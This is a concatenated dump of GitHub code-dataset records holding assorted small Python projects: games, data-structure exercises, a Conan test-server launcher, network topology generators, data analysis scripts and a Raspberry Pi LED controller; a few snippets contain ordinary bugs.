+ 1)][0:self.__field_size - i])\n \n starts = [i for i in list(range(self.__field_size, len(self.__field), self.__field_size))[0:self.__field_size - self.__win_line]]\n for i in range(len(starts)):\n self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size + 1)][0:self.__field_size - i])\n \n starts = [i for i in range(self.__win_line - 1, self.__field_size)]\n for i in range(len(starts)):\n self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size - 1)][0:self.__field_size + i - (self.__field_size - self.__win_line)])\n\n starts = [i for i in list(range(self.__field_size - 1, len(self.__field), self.__field_size))[1:self.__field_size - (self.__win_line - 1)]]\n for i in range(len(starts)):\n self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size - 1)][0:self.__field_size - i])\n \n \n if sign is None:\n self.__sign = TicTacToe.CROSS if randint(0, 1) == 1 else TicTacToe.ZERO\n if self.__sign == TicTacToe.ZERO:\n self.__bot_move()\n else:\n self.__sign = sign\n\n\n def get_id(self) -> int:\n\n \"\"\"\n Метод, возвращающий идентификатор игры.\n \"\"\"\n\n return self.__id\n\n\n def get_field(self) -> list[str]:\n\n \"\"\"\n Метод, возвращающий игровое поле.\n \"\"\"\n\n return self.__field.copy()\n\n\n def is_active(self) -> bool:\n\n \"\"\"\n Проверка состояния игры. Возвращает False, если игра завершена.\n \"\"\"\n\n return self.__check() == TicTacToe.NONE\n\n\n def get_sign(self) -> str:\n\n \"\"\"\n Метод, возвращающий символ игрока.\n \"\"\"\n\n return self.__sign\n\n def get_win_line(self) -> int:\n\n \"\"\"\n Метод, возвращающий колличество клеток для победы.\n \"\"\"\n\n return self.__win_line\n \n\n def move(self, index: int) -> str:\n\n \"\"\"\n Метод хода игрока.\n \"\"\"\n\n result = self.__check()\n if result != TicTacToe.NONE:\n return TicTacToe.STOP\n\n if not index in range(len(self.__field)) or self.__field[index] != TicTacToe.EMPTY:\n return TicTacToe.NONE\n\n self.__field[index] = self.__sign\n result = self.__check()\n if result == TicTacToe.DRAW:\n return result\n elif result == TicTacToe.STOP:\n return TicTacToe.WIN\n\n self.__bot_move()\n result = self.__check()\n if result == TicTacToe.DRAW:\n return (self.__field, result)\n elif result == TicTacToe.STOP:\n return TicTacToe.LOSE\n\n return TicTacToe.NONE\n\n\n def __bot_move(self) -> None:\n\n \"\"\"\n Метод хода бота.\n \"\"\"\n\n bot_sign = TicTacToe.CROSS if self.__sign != TicTacToe.CROSS else TicTacToe.ZERO\n\n moves = []\n for i in range(1, self.__win_line):\n moves.insert(0, (self.__sign, i))\n moves.insert(0, (bot_sign, i))\n\n for move in moves:\n result = self.__find_cell(move[0], move[1])\n if len(result) != 0:\n self.__field[result[randint(0, len(result) - 1)]] = bot_sign\n return\n\n while True:\n num = randint(0, len(self.__field) - 1)\n if self.__field[num] == TicTacToe.EMPTY:\n self.__field[num] = bot_sign\n return\n\n\n def __find_cell(self, sign: str, sign_count: int) -> list[int]:\n\n \"\"\"\n Поиск наилучшего хода для бота.\n \"\"\"\n\n other = TicTacToe.CROSS if sign == TicTacToe.ZERO else TicTacToe.ZERO\n\n empties = []\n for line in self.__lines:\n for i in range(len(line) - (self.__win_line - 1)):\n cells = line[i:i+3]\n temp = list(map(lambda j: self.__field[j], cells))\n if not other in temp and len(list(filter(lambda k: k == sign, temp))) == sign_count:\n empties += list(filter(lambda l: self.__field[l] == TicTacToe.EMPTY, cells))\n\n return empties\n\n\n def __check(self) -> str:\n\n \"\"\"\n Метод проверки текущего состояния игры.\n \"\"\"\n \n for line in self.__lines:\n for i in range(len(line) - (self.__win_line - 1)):\n temp = list(set(map(lambda j: self.__field[j], line[i:i+self.__win_line])))\n if len(temp) == 1 and temp[0] != TicTacToe.EMPTY:\n return TicTacToe.STOP\n\n temp = list(set(self.__field))\n if len(temp) == 2 and not TicTacToe.EMPTY in temp:\n return TicTacToe.DRAW\n\n return TicTacToe.NONE","repo_name":"ivankopanyov/TicTacToeBot","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":7444,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10129629539","text":"\n# Creating the array of lists structure\nAMOUNT_OF_BUCKETS = 5\nhashtable = []\nfor i in range(AMOUNT_OF_BUCKETS):\n hashtable.append([]) #O(1)\n\n\n# O(M) where M is the amount of letters\ndef hashFunction(text):\n ret = 0\n for letter in text:\n ret += int(ord(letter))\n \n return ret%AMOUNT_OF_BUCKETS\n\n\ndef insertElement(text, value):\n pos = hashFunction(text) #O(M)\n hashtable[pos].append( (text, value)) #O(1)\n\ndef deleteElement(text):\n pos = hashFunction(text) #O(M)\n\n #O(N) where N is the amount of elements on the same bucket\n for storedTuple in hashtable[pos]:\n if storedTuple[0] == text:\n hashtable[pos].remove(storedTuple)\n break\n\ndef getValue(text):\n pos = hashFunction(text) #O(M)\n \n #O(N) where N is the amount of elements on the same bucket\n for storedTuple in hashtable[pos]:\n if storedTuple[0] == text:\n return storedTuple[1]\n\n\ninsertElement(\"BEATRIZ\", 10)\ninsertElement(\"CAIO\", 20)\ninsertElement(\"GUSTAVO\", 30)\ninsertElement(\"ITALO\", 40)\ninsertElement(\"LUCAS\", 50)\n\nprint(hashtable)\nprint(\"Qual valor de ITALO? \")\nprint(getValue(\"ITALO\"))","repo_name":"nekiter/RoadToRedCoder","sub_path":"data_structures_implementation/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2855977208","text":"#!/usr/bin/python\nfrom conans.server.service.authorize import BasicAuthorizer, BasicAuthenticator\nimport os\nfrom conans.server.conf import get_file_manager\nfrom conans.server.rest.server import ConanServer\nfrom conans.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager\nfrom conans.server.crypto.jwt.jwt_updown_manager import JWTUpDownAuthManager\nfrom conans.util.log import logger\nfrom conans.util.files import mkdir\nfrom conans.test.utils.test_files import temp_folder\nfrom conans.server.migrate import migrate_and_get_server_config\nfrom conans.search import DiskSearchAdapter, DiskSearchManager\nfrom conans.paths import SimplePaths\n\n\nTESTING_REMOTE_PRIVATE_USER = \"private_user\"\nTESTING_REMOTE_PRIVATE_PASS = \"private_pass\"\n\n\nclass TestServerLauncher(object):\n port = 0\n\n def __init__(self, base_path=None, read_permissions=None,\n write_permissions=None, users=None, base_url=None, plugins=None,\n server_version=None,\n min_client_compatible_version=None):\n\n plugins = plugins or []\n if not base_path:\n base_path = temp_folder()\n\n if not os.path.exists(base_path):\n raise Exception(\"Base path not exist! %s\")\n\n # Define storage_folder, if not, it will be readed from conf file and pointed to real user home\n storage_folder = os.path.join(base_path, \".conan_server\", \"data\")\n mkdir(storage_folder)\n\n server_config = migrate_and_get_server_config(base_path, storage_folder)\n\n if TestServerLauncher.port == 0:\n TestServerLauncher.port = server_config.port\n\n # Encode and Decode signature for Upload and Download service\n updown_auth_manager = JWTUpDownAuthManager(server_config.updown_secret,\n server_config.authorize_timeout)\n self.file_manager = get_file_manager(server_config, public_url=base_url,\n updown_auth_manager=updown_auth_manager)\n\n search_adapter = DiskSearchAdapter()\n self.search_manager = DiskSearchManager(SimplePaths(server_config.disk_storage_path), search_adapter)\n # Prepare some test users\n if not read_permissions:\n read_permissions = server_config.read_permissions\n read_permissions.append((\"private_library/1.0.0@private_user/testing\", \"*\"))\n read_permissions.append((\"*/*@*/*\", \"*\"))\n\n if not write_permissions:\n write_permissions = server_config.write_permissions\n\n if not users:\n users = dict(server_config.users)\n\n users[TESTING_REMOTE_PRIVATE_USER] = TESTING_REMOTE_PRIVATE_PASS\n\n authorizer = BasicAuthorizer(read_permissions, write_permissions)\n authenticator = BasicAuthenticator(users)\n credentials_manager = JWTCredentialsManager(server_config.jwt_secret,\n server_config.jwt_expire_time)\n\n logger.debug(\"Storage path: %s\" % storage_folder)\n self.port = TestServerLauncher.port\n TestServerLauncher.port += 1\n self.ra = ConanServer(self.port, False, credentials_manager, updown_auth_manager,\n authorizer, authenticator, self.file_manager, self.search_manager, \n server_version, min_client_compatible_version)\n for plugin in plugins:\n self.ra.api_v1.install(plugin)\n\n def start(self, daemon=True):\n \"\"\"from multiprocessing import Process\n self.p1 = Process(target=ra.run, kwargs={\"host\": \"0.0.0.0\"})\n self.p1.start()\n self.p1\"\"\"\n import threading\n self.t1 = threading.Thread(target=self.ra.run, kwargs={\"host\": \"0.0.0.0\"})\n self.t1.daemon = daemon\n self.t1.start()\n\n def stop(self):\n self.ra.root_app.close()\n\n\nif __name__ == \"__main__\":\n server = TestServerLauncher()\n server.start(daemon=False)\n","repo_name":"AversivePlusPlus/AversivePlusPlus","sub_path":"tools/conan/conans/server/test/utils/server_launcher.py","file_name":"server_launcher.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"6"} +{"seq_id":"73026326587","text":"'''\nCreates 3 generic simple example topologies, traffic matrices, and paths\nfor testing with Ripple, and Ripple + ONSET\n\nLinear graph.\n\nseries of 3 or more links.\nA <-> B <-> C\n\nMesh.\n4 by 4 grid topology.\nA <-> B <-> C <-> D\n^ ^ ^ ^\n| | | |\nv v v v\nE <-> F <-> G <-> H\n...\n\nDumbbell.\nLinear topology with whiskers.\nA F\n \\ /\n \\ /\nB---D <-> E---G\n / \\\n / \\\nC H\n'''\n\n# library for creating graphs. \nimport networkx as nx\nfrom networkx.algorithms.centrality.reaching import local_reaching_centrality\n\n# creating traffic matrices\nfrom onset.utilities.tmg import rand_gravity_matrix\nfrom attacker import read_tm_to_tc, Attacker\n\n# json writing utilities\nfrom onset.utilities.matrix_to_json_flows import write_flows_to_json\nfrom onset.utilities.paths_to_json import convert_paths_onset_to_json\nfrom onset.utilities.write_gml import write_gml\n\ndef get_linear_topo(n_links:int) -> nx.Graph:\n # creates and returns linear topology with n_links\n # series of 3 or more links.\n # e.g., A <-> B <-> C\n\n G = nx.Graph()\n my_nodes = ['s{}'.format(n+1) for n in range(n_links+1)]\n i = 0\n for u, v in zip(my_nodes, my_nodes[1:]):\n G.add_edge(u, v, capacity=100)\n G.nodes[u][\"Longitude\"] = i\n G.nodes[u][\"Latitude\"] = 0\n i += 1\n\n G.nodes[my_nodes[-1]][\"Longitude\"] = i\n G.nodes[my_nodes[-1]][\"Latitude\"] = 0\n \n return G\n\ndef get_whisker_topo(n_span_hops:int, n_whiskers) -> nx.Graph:\n # creates and returns whisker topology with n_span_hops links in the middle and n_whiskers on each end.\n # Linear topology with whiskers\n # e.g., \n # get_whisker_topo(n_span_hops=1, n_whiskers=3).\n # A F\n # \\ /\n # \\ /\n # B---D <-> E---G\n # / \\\n # / \\\n # C H\n\n G = nx.Graph()\n \n nodes = ['s{}'.format(n + 1) for n in range( 2*(n_whiskers+1) + (n_span_hops - 1) )]\n \n left_whisk_nodes = nodes[:n_whiskers]\n left_span_node = nodes[n_whiskers]\n span_nodes = nodes[n_whiskers:-n_whiskers]\n right_span_node = nodes[-n_whiskers-1]\n right_whisk_nodes = nodes[-n_whiskers:]\n \n mid_latitude = n_whiskers / 2 \n longitude = 0\n\n for i, lwn in enumerate(left_whisk_nodes):\n G.add_edge(lwn, left_span_node, capacity=100)\n G.nodes[lwn]['Latitude'] = i\n G.nodes[lwn]['Longitude'] = longitude\n \n # Left whiskers placed, move longitude.\n longitude += 1 \n G.nodes[left_span_node]['Longitude'] = longitude\n G.nodes[left_span_node]['Latitude'] = mid_latitude \n \n\n # first span node placed, move longitude\n longitude += 1 \n\n for u, v in zip(span_nodes, span_nodes[1:]):\n G.add_edge(u, v, capacity=100)\n G.nodes[v]['Longitude'] = longitude\n G.nodes[v]['Latitude'] = mid_latitude\n \n \n # after each span hop is placed, move longitude\n longitude += 1\n\n for i, rwn in enumerate(right_whisk_nodes):\n G.add_edge(right_span_node, rwn, capacity=100)\n G.nodes[rwn]['Longitude'] = longitude\n G.nodes[rwn]['Latitude'] = i\n \n return G\n\ndef get_whisker_topo(n_span_hops:int, n_whiskers) -> nx.Graph:\n # creates and returns whisker topology with n_span_hops links in the middle and n_whiskers on each end.\n # Linear topology with whiskers\n # e.g., \n # get_whisker_topo(n_span_hops=1, n_whiskers=3).\n # A F\n # \\ /\n # \\ /\n # B---D <-> E---G\n # / \\\n # / \\\n # C H\n\n G = nx.Graph()\n \n nodes = ['s{}'.format(n + 1) for n in range( 2*(n_whiskers+1) + (n_span_hops - 1) )]\n \n left_whisk_nodes = nodes[:n_whiskers]\n left_span_node = nodes[n_whiskers]\n span_nodes = nodes[n_whiskers:-n_whiskers]\n right_span_node = nodes[-n_whiskers-1]\n right_whisk_nodes = nodes[-n_whiskers:]\n \n mid_latitude = n_whiskers / 2 \n longitude = 0\n\n for i, lwn in enumerate(left_whisk_nodes):\n G.add_edge(lwn, left_span_node, capacity=100)\n G.nodes[lwn]['Latitude'] = i\n G.nodes[lwn]['Longitude'] = longitude\n \n # Left whiskers placed, move longitude.\n longitude += 1 \n G.nodes[left_span_node]['Longitude'] = longitude\n G.nodes[left_span_node]['Latitude'] = mid_latitude \n \n\n # first span node placed, move longitude\n longitude += 1 \n\n for u, v in zip(span_nodes, span_nodes[1:]):\n G.add_edge(u, v, capacity=100)\n G.nodes[v]['Longitude'] = longitude\n G.nodes[v]['Latitude'] = mid_latitude\n \n \n # after each span hop is placed, move longitude\n longitude += 1\n\n for i, rwn in enumerate(right_whisk_nodes):\n G.add_edge(right_span_node, rwn, capacity=100)\n G.nodes[rwn]['Longitude'] = longitude\n G.nodes[rwn]['Latitude'] = i\n \n return G \n\ndef get_grid_topo(grid_dimension) -> nx.Graph:\n G = nx.generators.grid_graph(dim=(grid_dimension, grid_dimension))\n nx.set_edge_attributes(G, 100, 'capacity')\n for (x, y) in G.nodes():\n G.nodes[(x,y)][\"Longitude\"] = x\n G.nodes[(x,y)][\"Latitude\"] = y\n \n labels = {node : 's{}'.format(i+1) for i, node in enumerate(G.nodes())}\n nx.relabel_nodes(G, labels,copy=False)\n return G\n\n\ndef main():\n # Step 1: create graphs.\n GRAPH_FOLDER = \"/home/matt/network_stability_sim/data/graphs/gml/\"\n linear_length = 10\n linear_G = get_linear_topo(linear_length)\n\n whiskers, span_hops = 3, 2\n dumbbell_G = get_dumbbell_topo(n_whiskers=whiskers, n_span_hops=span_hops)\n \n grid_dim = 3\n grid_G = get_grid_topo(grid_dim)\n linear_topo_file = GRAPH_FOLDER + \"linear_\" + str(linear_length) + \".gml\"\n dumbbell_topo_file = GRAPH_FOLDER + \"dumbbell_\" + str(whiskers) + \"_\" + str(span_hops) + \".gml\"\n grid_topo_file = GRAPH_FOLDER + \"grid_\" + str(grid_dim) + \".gml\"\n write_gml(linear_G, linear_topo_file)\n print('wrote graph to: ' + linear_topo_file)\n \n write_gml(dumbbell_G, dumbbell_topo_file)\n print('wrote graph to: ' + dumbbell_topo_file)\n\n write_gml(grid_G, grid_topo_file)\n print('wrote graph to: ' + grid_topo_file)\n \n # Step 2: Create traffic flows for benign and attack traffic. \n\n # Step 3: Create traffic flows for benign and attack traffic. \n\nif __name__ == \"__main__\":\n main()","repo_name":"mattall/topology-programming","sub_path":"src/onset/simple_topo_examples.py","file_name":"simple_topo_examples.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19515537194","text":"a,b = map(int, input().split())\nm = szsssszz1\nans=1\ni = a\ntable = []\nwhile i * i <= b:\n if n%i == 0:\n table.append(i)\n table.append(n//i)\n i += 1\ntable = list(set(table))\n","repo_name":"Neru-Neru/Atcoder","sub_path":"JPA_2/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6785967723","text":"import pandas as pd\nimport string\n\ndef clean_data():\n \"\"\"\n Function that will clean up the raw data set\n \"\"\"\n df=pd.read_csv('DOHMH_New_York_City_Restaurant_Inspection_Results.csv') # read in data\n df=df[pd.notnull(df['GRADE'])] # drop rows with grades missing\n df=df[pd.notnull(df['GRADE DATE'])] # drop rows with grade date missing\n df=df[df.GRADE != 'P'] # drop rows whose grade are P\n df=df[df.GRADE != 'Z'] # drop rows whose grade are Z\n df=df[df.GRADE != 'Not Yet Graded'] # drop rows whose grade are Not Yet Graded\n df=df[df.BORO != 'Missing'] # drop rows whose Borough information is missing\n df['GRADE DATE']=pd.to_datetime(df['GRADE DATE']) # convert string date time to python datetime format\n return df\n\ndef test_grades(grade_list):\n \"\"\"\n Function that takes in a list of grades and calculate whether the restaurant is improving, declining or unchanging\n \n The intuition of this method is to check grades iteratively. Say a total score of zero at begining. If improving, then add 1.\n \n If declining, then minus 1. If unchanging, then do nothing. After comparing every grades in the list iteratively, it will have a sum.\n \n Positive, Negative or Zero. If positive, then improving. If negative, then declining. If zero, then unchanging.\n \"\"\"\n value = lambda x: string.ascii_uppercase.index(x)+1 # mapping uppercase letters to integers starting from 1\n j=0 # initialize three values to store improving, declining or unchanging increments\n k=0\n l=0\n for i in range(len(grade_list)-1): # do comparison between every elements in the list until the last one\n if value(grade_list[i+1]) > value(grade_list[i]):\n j+=-1 # if declining and letter index gets larger, then minus 1\n elif value(grade_list[i+1]) == value(grade_list[i]):\n l+=0 # if unchanging and letter index keep the same, then do nothing\n elif value(grade_list[i+1]) < value(grade_list[i]):\n k+=1 # if improving and letter index gets smaller, then plus 1\n if j+k+l > 0:\n return 1 # if the sum is positive, then it is improving, return 1\n elif j+k+l == 0:\n return 0 # if the sum is zero, then it is not changing, return 0\n elif j+k+l < 0:\n return -1 # if the sum is negative, then it is declining, return -1\n\ndef test_restaurant_grades(camis_id, df):\n \"\"\"\n Function that takes in a particular camis_id and returns if the restaurant is improving, declining, or unchanging.\n \"\"\"\n df=df[df.CAMIS==camis_id] # subset the data with particular camis_id\n return test_grades(df['GRADE'].iloc[::-1].values.tolist()) # using the above function to calculate the index of improving, declining, or unchanging\n # using the grades in ascending order by date\ndef plot_nyc(df):\n \"\"\"\n Function that plots the total numbere of restaurants in NYC and five boroughs for each grade over time.\n \"\"\"\n df=df.groupby(['GRADE DATE', 'GRADE']) # subset the dataframe with only grade and grade date\n df=pd.DataFrame(df.size().unstack().fillna(0)) # transform the object into tabular with each grade counts, also fill in missing value with 0\n df.plot() # using the built in dataframe plot function\n \n\n\t\n\n\n","repo_name":"ky822/assignment10","sub_path":"wl1162/supplement.py","file_name":"supplement.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"41940864761","text":"from typing import List, Tuple\nfrom utils import read_aoc_input\n\ntarget_x = range(282, 315)\ntarget_y = range(-80, -44)\n\n# assert x_vel > 0 (therefore always just -= 1 (unless 0))\n# y_vel -= 1 each time\n\n\nvelocity = int\n\ndef follow_trajectory(i_x_vel, i_y_vel, step_count=4000) -> List[Tuple[int, int]]:\n x, y = 0, 0\n x_vel, y_vel = i_x_vel, i_y_vel\n steps = []\n for step in range(step_count):\n x += x_vel\n y += y_vel\n if x_vel != 0:\n x_vel -= 1\n y_vel -= 1\n steps.append((x, y))\n\n return steps\n\nheights = []\nfor x_vel in range(0, 400):\n for y_vel in range(-100, 100):\n traject = follow_trajectory(x_vel, y_vel)\n if any([x in target_x and y in target_y for x, y in traject]):\n heights.append((x_vel,y_vel))\n\nprint(len(heights))\n \n\n\n","repo_name":"james-seymour/aoc-2021","sub_path":"day_17_a.py","file_name":"day_17_a.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"62221152","text":"from causallearn.search.ConstraintBased.FCI import fci \nfrom causallearn.utils.GraphUtils import GraphUtils\nfrom sklearn.datasets import load_breast_cancer\nimport numpy as np\nfrom src.causal_graph import CausalGraph\nfrom src.model import Model\n\ninitial_data = load_breast_cancer()\n\n# Causal variables generation\ncausal_graph = CausalGraph(initial_data_array=initial_data, \n class_used=True, \n no_d_sep=False, \n remove_common_causes=False, \n independence_test=\"fisherz\")\ncausal_graph.create_graph()\ncausal_graph.save_graph_as_figure()\ncausal_graph.save_graph_as_dot()\n\ncausal_graph.get_causal_relations()\n# causal_dataset = causal_graph.get_data_with_causal_variables()\nprint(f\"Initial DataFrame shape: {causal_graph.get_df().shape}\")\nprint(f\"Causal DataFrame shape: {causal_graph.get_causal_df().shape}\")\ncausal_graph.save_causal_df_as_csv()\ncausal_graph.save_df_as_csv()\n\n# Dataset selection\ncausal_df = causal_graph.get_causal_df()\ndf = causal_graph.get_df()\n\nselected_df = causal_df\n\n# Model training and evaluation\nmodel = Model(data=selected_df)\nmodel.preprocess_data()\nmodel.split_data()\nmodel.fit()\nmodel.predict()\npredictions = model.get_predictions()\ny_test = model.get_y_test()\nprint(\"------------------------------------\\n\")\nprint(\"Model predictions:\\n\")\nprint(f\"Predictions: \\n{predictions}\\n\")\nprint(f\"y_test: \\n{y_test.to_numpy()}\")\nprint(\"------------------------------------\\n\")\nprint(\"Model metrics:\\n\")\nmodel.calculate_accuracy()\naccuracy = model.get_accuracy()\nprint(f\"Accuracy: \\t{accuracy}\")\n\nmodel.calculate_precision()\nprecision = model.get_precision()\nprint(f\"Precision: \\t{precision}\")\n\nmodel.calculate_recall()\nrecall = model.get_recall()\nprint(f\"Recall: \\t{recall}\")\n\nmodel.calculate_f1()\nf1 = model.get_f1()\nprint(f\"F1: \\t{f1}\")\n\nmodel.calculate_confusion_matrix()\nconfusion_matrix = model.get_confusion_matrix()\nprint(f\"Confusion matrix: \\n{confusion_matrix}\")\n\nmodel.calculate_roc_auc()\nroc_auc = model.get_roc_auc()\nprint(f\"ROC AUC: \\t{roc_auc}\")\nprint(\"------------------------------------\")","repo_name":"csymvoul/causal_variables_generation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12688481278","text":"# https://leetcode.com/problems/ransom-note/\n\nfrom itertools import count\n\n\nclass Solution:\n def canConstruct(self, ransomNote: str, magazine: str) -> bool:\n mag_dict = {}\n for char in magazine:\n if mag_dict.get(char) is not None:\n mag_dict[char] += 1\n else:\n mag_dict[char] = 1\n print(mag_dict)\n for ele in ransomNote:\n if mag_dict.get(ele) is not None:\n if mag_dict.get(ele) > 0:\n mag_dict[ele] -= 1\n else: return False\n else: return False\n return True\n \n def canConstruct_optimized(self, ransomNote: str, magazine: str) -> bool:\n for ele in ransomNote:\n # print(ele)\n if ele in magazine:\n magazine = magazine.replace(ele, \"\", 1)\n else: return False\n # print(\"mag\", magazine)\n \n return True\n\n\nsolved = Solution()\nprint(solved.canConstruct_optimized(ransomNote=\"aa\", magazine=\"aab\")) # True\nprint(solved.canConstruct_optimized(ransomNote=\"aa\", magazine=\"ab\")) # False","repo_name":"zvovov/competitive_coding","sub_path":"leetcode/study_plan_data_structure/383_ransom_note.py","file_name":"383_ransom_note.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21188558479","text":"lower = int(input().strip()) \r\nhigher = int(input().strip())\r\nresult = []\r\nsum1 = 0\r\nfor i in range(lower, higher + 1):\r\n split = []\r\n sq = i * i \r\n arr = str(sq)\r\n length = len(arr) // 2\r\n if length == 0:\r\n split = arr\r\n else:\r\n split.append(arr[0 : length]) # appending the d digits in list\r\n split.append(arr[length : ]) # and the other d digits in the list\r\n split = map(int, split) \r\n sum1 = sum(split) # summing digits after appending them\r\n if sum1 == i: # checking the kaprekar condition\r\n result.append(i)\r\nif result:\r\n print(' '.join(map(str, result)))\r\nelse:\r\n print(\"INVALID RANGE\")\r\n\r\n","repo_name":"AhmedMaherTohmay/IEEE-ZSB-Technica1-Rookies-23","sub_path":"task7/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71745851707","text":"\n\nclass Animal:\n def __init__(self, nombre, color, sexo):\n self.nombre = nombre\n self.color = color\n self.sexo = sexo\n self.horas_sueno = 0\n self.horas_juego_ind = 0\n self.horas_juego_grup = 0\n self.comidas = 0\n self.horas_regaloneo = 0\n\n def set_parametros(self, animal):\n if animal.personalidad == 'juguetona':\n self.horas_sueno = 8 * animal.expresion\n self.horas_juego_ind = 1 * animal.expresion\n self.horas_juego_grup = 7 * animal.expresion\n self.comidas = 4 * animal.expresion\n self.horas_regaloneo = 4 * animal.expresion\n else:\n self.horas_sueno = 12 * animal.expresion\n self.horas_juego_ind = 5 * animal.expresion\n self.horas_juego_grup = 1 * animal.expresion\n self.comidas = 4 * animal.expresion\n self.horas_regaloneo = 2 * animal.expresion\n\n def jugar(self):\n pass\n\n def comer(self):\n pass\n\n def __str__(self):\n return \"Me llamo {}, soy {} y tengo el pelo {}.\".format(self.nombre, self.sexo, self.color)\n\n\nclass Gato(Animal):\n def __init__(self, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n\n def maullar(self):\n print(\"Miauuu!! Miauuu!\")\n return\n\n def jugar(self):\n print(\"Humano, ahora, juguemos.\")\n return\n\n def comer(self):\n print(\"El pellet es horrible. Dame comida en lata.\")\n return\n\n\nclass Perro(Animal):\n def __init__(self, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n\n def ladrar(self):\n print('Guau!! Guau!!')\n return\n\n def jugar(self):\n print('Tirame la pelota :)')\n return\n\n def comer(self):\n print('Mami :) Quiero comeeeerr!!')\n return\n\n\nclass SiamePUC(Gato):\n def __init__(self, expresion, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n self.expresion = expresion\n self.personalidad = 'egoista'\n if self.sexo == \"Hembra\":\n self.expresion *= 1.5\n self.set_parametros(self)\n\n def comer(self):\n print(\"Quiero comida.\")\n super().comer()\n super().maullar()\n\n\nclass GoldenPUC(Perro):\n def __init__(self, expresion, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n self.expresion = expresion\n self.personalidad = 'juguetona'\n if self.sexo == \"Hembra\":\n self.expresion *= 0.9\n else:\n self.expresion *= 1.1\n self.set_parametros(self)\n\n def jugar(self):\n print(\"Quiero jugar.\")\n super().jugar()\n self.ladrar()\n\n\nclass PUCTerrier(Perro):\n def __init__(self, expresion, nombre, color, sexo):\n super().__init__(nombre, color, sexo)\n self.expresion = expresion\n self.personalidad = 'egoista'\n if self.sexo == \"Hembra\":\n self.expresion *= 1\n else:\n self.expresion *= 1.2\n self.set_parametros(self)\n\n def comer(self):\n print(\"Quiero comer.\")\n super().comer()\n self.ladrar()\n\n\ndef estadisticas(animales):\n sueno, juego_ind, juego_grup, comidas, horas_regaloneo = 1000, 1000, 0, 0, 0\n for animal in animales:\n if animal.horas_sueno < sueno:\n sueno = animal.horas_sueno\n if animal.horas_juego_ind < juego_ind:\n juego_ind = animal.horas_juego_ind\n if animal.horas_juego_grup > juego_grup:\n juego_grup = animal.horas_juego_grup\n comidas += animal.comidas\n horas_regaloneo += animal.horas_regaloneo\n print('''Tiempo de sueno: {}\\nTiempo de juego individual: {}\nTiempo de juego grupal: {}\\nCantidad de comidas: {}\nTiempo de regaloneo: {}\n'''.format(sueno, juego_ind, juego_grup, comidas, horas_regaloneo))\n return \n \nif __name__ == '__main__':\n animals = list()\n animals.append(GoldenPUC(expresion=0.5, nombre=\"Mara\", color=\"Blanco\", sexo=\"Hembra\"))\n animals.append(GoldenPUC(expresion=0.9, nombre=\"Eddie\", color=\"Rubio\", sexo=\"Macho\"))\n animals.append(SiamePUC(expresion=0.9, nombre=\"Felix\", color=\"Naranjo\", sexo=\"Hembra\"))\n animals.append(PUCTerrier(expresion=0.8, nombre=\"Betty\", color=\"Café\", sexo=\"Hembra\"))\n\n for a in animals:\n print(a)\n a.jugar()\n a.comer()\n \n estadisticas(animals)\n","repo_name":"isidoravs/iic2233-2016-2","sub_path":"Actividades/AC02/AC02.py","file_name":"AC02.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37970045539","text":"'''\nVarious exercises of an RGB led\n'''\n\nimport RPi.GPIO as GPIO\nfrom time import sleep\nfrom numpy import interp\n\npin_R = 33\npin_B = 35\npin_G = 37\n#pin_W = 22 \nstate = False\n# Values are dimming. 0 = Full power, 100 = off, going from max power up to 100\n\nOFF = 0\n\nFREQUENCY = 100\n\n\n# Spectrum range\nSPEC_LOW = 380\nSPEC_HIGH = 750\n\nclass PWM(object):\n\n def __init__(self, logger=None):\n\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n\n\n GPIO.setup(pin_R, GPIO.OUT)\n GPIO.setup(pin_G, GPIO.OUT)\n GPIO.setup(pin_B, GPIO.OUT)\n\n GPIO.output(pin_R, GPIO.LOW)\n GPIO.output(pin_G, GPIO.LOW)\n GPIO.output(pin_B, GPIO.LOW)\n\n self.pwm_R = GPIO.PWM(pin_R, FREQUENCY)\n self.pwm_G = GPIO.PWM(pin_G, FREQUENCY)\n self.pwm_B = GPIO.PWM(pin_B, FREQUENCY)\n\n self.pwm_R.start(0)\n self.pwm_G.start(0)\n self.pwm_B.start(0)\n #print(\"off\")\n self.set_lights(OFF, OFF, OFF, OFF)\n \n def spectrum(self):\n # display the full spectrum\n for x in range(SPEC_LOW, SPEC_HIGH):\n # get spectrum as 0-1 values\n r, g, b = self.spectrumToRGB(x)\n # map 0-1 to pwm value\n #r1 = map(r, 0, 1, 0, 100)\n #g1 = 